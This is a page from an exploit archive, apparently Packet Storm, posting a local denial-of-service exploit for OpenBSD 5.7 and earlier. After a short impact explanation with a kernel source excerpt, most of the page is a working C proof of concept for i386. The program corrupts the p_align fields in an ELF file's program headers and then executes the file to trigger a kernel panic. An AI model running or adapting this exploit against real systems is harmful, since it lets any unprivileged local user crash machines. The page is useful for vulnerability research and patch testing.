all things security

OpenBSD 5.7 sys_execve() Denial Of Service

OpenBSD 5.7 sys_execve() Denial Of Service
Posted Jun 14, 2015
Authored by Bruno Luiz

OpenBSD versions 5.7 and below local kernel panic sys_execve() denial of service exploit.

tags | exploit, denial of service, kernel, local
systems | openbsd
MD5 | c0b2ee2ad53ffa8e5824528d011b3805

OpenBSD 5.7 sys_execve() Denial Of Service

Change Mirror Download
Impact

A non-privileged use could cause a local Denial-of-Service (DoS) condition by triggering a kernel panic through a malformed ELF
executable.

The kernel panic is reached at the UVM (virtual memory) subsystem. There are different if-else validations inside uvm_map(),and
uvm_map_vmspace_update() is called in the last else block as follows:

sys/uvm/uvm_map.c:
if (flags & UVM_FLAG_FIXED) {
...
} else if (*addr != 0 && (*addr & PAGE_MASK) == 0 &&
(map->flags & VM_MAP_ISVMSPACE) == VM_MAP_ISVMSPACE &&
(align == 0 || (*addr & (align - 1)) == 0) &&
uvm_map_isavail(map, NULL, &first, &last, *addr, sz)) {
/*
* Address used as hint.
*
* Note: we enforce the alignment restriction,
* but ignore pmap_prefer.
*/
} else if ((maxprot & VM_PROT_EXECUTE) != 0 &&
...
} else {
/*
* Update freelists from vmspace.
*/
if (map->flags & VM_MAP_ISVMSPACE)
uvm_map_vmspace_update(map, &dead, flags);


Exploit


/*
* tenochtitlan.c
*
* OpenBSD <= 5.7 Local Kernel Panic
* by d4t (@brunolcr)
*
* This PoC works only for i386.
*
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>
#ifndef __OpenBSD__
#error "Not an OpenBSD system !!!1111";
#else
#include <sys/exec_elf.h>
#endif
#ifndef __i386__
#error "Not an i386 system !!!1111";
#endif
// In Aztec mythology, Huitzilopochtli, was a god of war, a sun god,
// the patron of the city of Tenochtitlan, the Capital of the Aztec Empire.
const char pyramid[] =
" _____\n"
" _|[]_|_\n"
" _/_/=|_\\_\\_\n"
" _/_ /==| _\\ _\\_\n"
" _/__ /===|_ _\\ __\\_\n"
" _/_ _ /====| ___\\ __\\_\n"
" _/ __ _/=====|_ ___\\ ___ \\_\n"
" _/ ___ _/======| ____ \\_ __ \\_\n";
struct {
unsigned int idx;
Elf32_Word p_align;
} targets[] = {
{ 6, 0xb16b00b5 }, // ( * )( * )
{ 6, 0xdeadface },
{ 4, 0x00001001 },
{ 0, 0x00000004 }
};
int main(int argc, char **argv)
{
Elf32_Ehdr *hdr;
Elf32_Phdr *pht; // Program Header Table
struct stat statinfo;
char *elfptr;
int fd, r;
if(argc < 2){
fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]);
exit(-1);
}
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
if(fstat(fd, &statinfo) == -1){
perror("stat");
close(fd);
exit(-1);
}
if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) ==
MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}
hdr = (Elf32_Ehdr *) (elfptr);
pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff);
printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum);
srand(time(NULL));
r = rand();
if(r % 3 == 0){
#ifdef OpenBSD5_5
pht[targets[0].idx].p_align = targets[0].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align);
#else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align
pht[targets[1].idx].p_align = targets[1].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align);
#endif
} else if(r % 3 == 1){
pht[targets[2].idx].p_align = targets[2].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align);
} else {
int p;
for(p = 0; p < hdr->e_phnum; p++, pht++)
if(pht->p_type == PT_LOAD){
pht->p_align = targets[3].p_align;
printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align);
}
}
// Synchronize the ELF in memory and the file system
if(msync(elfptr, 0, MS_ASYNC) == -1){
perror("msync");
close(fd);
exit(-1);
}
if(munmap(elfptr, statinfo.st_size) == -1){
perror("munmap");
close(fd);
exit(-1);
}
close(fd);
printf("%s", pyramid);
sleep(1);
system(argv[1]);
// Should never reach this point, however sometimes the OS didn't crash with
// system() until the 2nd execution. Same behavior with execl and execv too.
printf("... try to execute %s manually.\n", argv[1]);
return -1;
}



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    5 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close